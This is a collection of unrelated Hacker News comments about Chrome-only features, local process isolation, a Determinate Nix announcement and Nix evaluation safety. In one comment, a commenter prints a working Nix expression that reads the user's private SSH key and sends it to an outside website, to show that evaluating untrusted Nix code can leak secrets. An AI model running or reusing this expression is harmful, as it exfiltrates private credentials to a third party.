No, that's a Chrome-specific feature that Google added. It is not part of any standard, and does not exist in other browsers (e.g. Safari and Firefox).

> The rest is just code running as your user can talk to code running as your user

No, that assumes that there is only a single user on the machine, and there are either no forms of isolation or that all forms of isolation also use private network namespaces, which has not been how daemons are isolated in UNIX or by systemd. For example, if you were to ever run OpenCode as root, any local process can trivially gain root as well.

Comments URL: https://news.ycombinator.com/item?id=46581095

Points: 432

# Comments: 142

Lots of exciting things here:

- Formally stabilizing flakes has been long awaited by everyone, I think.

- Parallel evaluation will improve developer experience - evaluation speed seems to be at the top of the list of feedback I've received from colleagues whom I've invited to try Nix.

- I'm hoping lazy trees will provide a better experience for flakes in monorepos.

Unfortunately I haven't had a great experience with the Determinate Nix installer when I tried it, though that was a while ago (shortly after launch) so may warrant revisiting.

I'm also concerned about the growing schism between Determinate Systems and the Nix community, as can be seen in the Discourse thread. I think there are opportunities to strengthen that bridge, e.g. naming things perhaps such that it's not possible to misinterpret this announcement as "Nix 3.0".

I am also curious to know what is your strategy for upholding the flakes stability guarantee without forking Nix. I'm not sure what the governance structure or roadmap is of the community Nix project, but would it not be possible that the project would want to eventually introduce a breaking change (e.g. to revisit the cross-compilation or parameterization aspects) that would affect Determinate Nix users?

This is false.

There is no need to do that. People who want to see dead comments can turn that option on in their profile.

Ah, I over-quoted that part. My mistake.

> Also, it doesn't work:

It will work with the default Nix settings.

> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

One would need to first turn it on to be able to turn it off.

> https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Indeed, note the default value.

> I don't think it did. I'm not sure what it was supposed to help with.

I was hoping that it would be interesting to you, but also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But, I think I understand now that maybe you don't care about what happens to other people.

In that comment, you wrote:

> It can delete your home directory or email your ssh private keys to Zimbabwe.

I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):

    let
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
    builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"

Hope this helps.

It also looks like I'm not the only one who hasn't figured out that the list of building blocks is scrollable!

https://github.com/spantaleev/matrix-docker-ansible-deploy/b...